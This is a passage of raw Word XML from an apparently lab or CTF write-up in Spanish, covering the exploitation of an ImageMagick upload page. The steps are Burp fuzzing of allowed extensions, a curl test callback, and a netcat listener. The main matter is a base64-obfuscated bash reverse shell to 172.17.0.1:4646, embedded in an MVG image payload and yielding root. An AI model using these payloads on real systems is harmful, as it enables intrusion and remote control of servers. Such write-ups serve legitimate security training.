      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de que no se podia las extensiones .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5054C1" w14:textId="2B7F2141" w:rsidR="00717A5A" w:rsidRDefault="00717A5A" w:rsidP="00717A5A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Seleccionamos la oración donde indica que no se soportan los archivos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> y automáticamente podemos ver que se crean unas expresiones regulares el cual lo que tenemos que hacer solo es dar clic en ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C18527E" w14:textId="3DECFECB" w:rsidR="00717A5A" w:rsidRDefault="00717A5A" w:rsidP="00717A5A">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47F7975A" wp14:editId="108FDE90">
            <wp:extent cx="4149306" cy="3795315"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="181388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85549" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4154902" cy="3800434"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E389451" w14:textId="7502C0A6" w:rsidR="00717A5A" w:rsidRDefault="00717A5A" w:rsidP="00717A5A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ya configurado todo lo anterior nos vamos en la pestaña inicial de positions y tiramos el ataque y como conclusión obtenemos las extensiones </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>jpg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, png, gif </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B880D69" w14:textId="0112DB0B" w:rsidR="00717A5A" w:rsidRDefault="00717A5A" w:rsidP="00717A5A">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B69D8E3" wp14:editId="20D4897A">
            <wp:extent cx="5612130" cy="3030220"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="164728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89515" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5612130" cy="3030220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0210E61D" w14:textId="77777777" w:rsidR="00717A5A" w:rsidRDefault="00717A5A" w:rsidP="00717A5A">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AE57918" w14:textId="77777777" w:rsidR="00717A5A" w:rsidRDefault="00717A5A" w:rsidP="00717A5A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DC86A4E" w14:textId="24261127" w:rsidR="00717A5A" w:rsidRDefault="00717A5A" w:rsidP="00717A5A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00717A5A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Comprobación de Vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F3319D" w14:textId="59C33058" w:rsidR="008B15B2" w:rsidRDefault="008B15B2" w:rsidP="008B15B2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="302297C8" wp14:editId="1DC2A111">
            <wp:extent cx="5612130" cy="2730500"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="618326168" name="Imagen 618326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28353" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5612130" cy="2730500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6104C0D9" w14:textId="32B834EC" w:rsidR="008B15B2" w:rsidRPr="008B15B2" w:rsidRDefault="008B15B2" w:rsidP="008B15B2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B15B2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cuando obtuvimos la solicitud de la subida del archivo test.txt podemos observar el contenido de dicho archivo que es “Archivo de prueba” por el cual podemos utilizar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B15B2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>repeater</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B15B2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> y en vez del contenido colocar el siguiente código:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B55662E" w14:textId="77777777" w:rsidR="008B15B2" w:rsidRPr="008B15B2" w:rsidRDefault="008B15B2" w:rsidP="008B15B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B15B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>push graphic-context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563DC5BB" w14:textId="5546DFE7" w:rsidR="008B15B2" w:rsidRPr="008B15B2" w:rsidRDefault="008B15B2" w:rsidP="008B15B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B15B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>viewbox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B15B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0 0 640 480</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD77AAA" w14:textId="1B087A3C" w:rsidR="008B15B2" w:rsidRPr="008B15B2" w:rsidRDefault="008B15B2" w:rsidP="008B15B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B15B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>fill '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B15B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B15B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>(https://127.0.0.0/oops.jpg"|curl "172.17.0.1:4646)'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDBBED6" w14:textId="2F46170E" w:rsidR="008B15B2" w:rsidRDefault="008B15B2" w:rsidP="008B15B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B15B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">pop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B15B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>graphic-context</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2C0EFFF9" w14:textId="77777777" w:rsidR="008B15B2" w:rsidRDefault="008B15B2" w:rsidP="008B15B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="556C3E43" w14:textId="10BCE3B6" w:rsidR="008B15B2" w:rsidRDefault="008B15B2" w:rsidP="008B15B2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Configuramos en nuestra terminal un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4646</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1A192F" w14:textId="18E0DFE8" w:rsidR="008B15B2" w:rsidRDefault="008B15B2" w:rsidP="008B15B2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Y en el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>repeater</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cambiamos la extensión a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>jpg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> y enviamos la solicitud y veremos que en la terminal de kali  hay respuesta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7586532C" w14:textId="14E4D457" w:rsidR="008B15B2" w:rsidRDefault="008B15B2" w:rsidP="008B15B2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29B2C98D" wp14:editId="4AEAE5B0">
            <wp:extent cx="5438095" cy="2057143"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1161927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27875" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5438095" cy="2057143"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="656917EE" w14:textId="5D4D9719" w:rsidR="008B15B2" w:rsidRDefault="008B15B2" w:rsidP="008B15B2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">El cual nos indica que hay conexión y comunicación con la maquina victima por el cual solo tenemos que configurar un archivo con extensión </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>jpg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, png o gif con una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>revershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB76DAC" w14:textId="77777777" w:rsidR="008B15B2" w:rsidRDefault="008B15B2" w:rsidP="008B15B2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="427C8F15" w14:textId="6618EBC3" w:rsidR="008B15B2" w:rsidRDefault="008B15B2" w:rsidP="008B15B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Acceso a la Maquina Victima</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C75AE86" w14:textId="76E154A1" w:rsidR="008B15B2" w:rsidRDefault="008B15B2" w:rsidP="008B15B2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ahora crearemos una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>revershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD3978">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">con nombre rshell.jpg y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>con el siguiente código:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7BEA6B" w14:textId="77777777" w:rsidR="008B15B2" w:rsidRPr="008B15B2" w:rsidRDefault="008B15B2" w:rsidP="008B15B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B15B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B15B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B15B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>graphic-context</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="32DCD0F8" w14:textId="77777777" w:rsidR="008B15B2" w:rsidRPr="008B15B2" w:rsidRDefault="008B15B2" w:rsidP="008B15B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B15B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>viewbox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B15B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0 0 640 480</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C497DD4" w14:textId="78DD1908" w:rsidR="008B15B2" w:rsidRPr="00DD3978" w:rsidRDefault="008B15B2" w:rsidP="008B15B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD3978">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>fill</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD3978">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD3978">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD3978">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">(https://127.0.0.0/oops.jpg?`echo </w:t>
      </w:r>
      <w:r w:rsidR="00DD3978" w:rsidRPr="009B7C68">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNy4wLjEvNDY0NiAwPiYxCg==</w:t>
      </w:r>
      <w:r w:rsidR="00DD3978" w:rsidRPr="009B7C68">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3978">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">| base64 -d | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD3978">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD3978">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>`"||id " )'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68873BB4" w14:textId="0A6D0FA7" w:rsidR="008B15B2" w:rsidRDefault="008B15B2" w:rsidP="008B15B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD3978">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">pop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD3978">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>graphic-context</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6BAFD72B" w14:textId="77777777" w:rsidR="00DD3978" w:rsidRDefault="00DD3978" w:rsidP="00DD3978">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1771FE95" w14:textId="6AFF5115" w:rsidR="00DD3978" w:rsidRDefault="00DD3978" w:rsidP="00DD3978">
      <w:r>
        <w:t xml:space="preserve">Volvemos a configurar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 4646 para obtener el </w:t>
      </w:r>
      <w:r w:rsidR="00762751">
        <w:t xml:space="preserve">Shell, y en la pagina web subimos el archivo rshell.jpg y obtenemos acceso a la maquina </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00762751">
        <w:t>victima.y</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00762751">
        <w:t xml:space="preserve"> con privilegios root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7BB549" w14:textId="77777777" w:rsidR="00A347CF" w:rsidRDefault="00A347CF" w:rsidP="00A347CF"/>
    <w:p w14:paraId="5842F691" w14:textId="77777777" w:rsidR="009B7C68" w:rsidRPr="00A84921" w:rsidRDefault="009B7C68" w:rsidP="009B7C68">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A84921">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Conclusiones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063F3FA7" w14:textId="38231382" w:rsidR="009B7C68" w:rsidRPr="00AB6094" w:rsidRDefault="009B7C68" w:rsidP="009B7C68">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB6094">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">En este informe, se detallaron las actividades llevadas a cabo para obtener </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">acceso a la maquina </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ImageMagic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB6094">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">privilegios root en la máquina A través del escaneo de puertos, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">el análisis de la página web el cual es para subir archivos por el cual tuvimos que determinar con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fuzzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> el tipo de archivos que la pagina admitía mediante la herramienta de burpsuite, después utilizamos una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
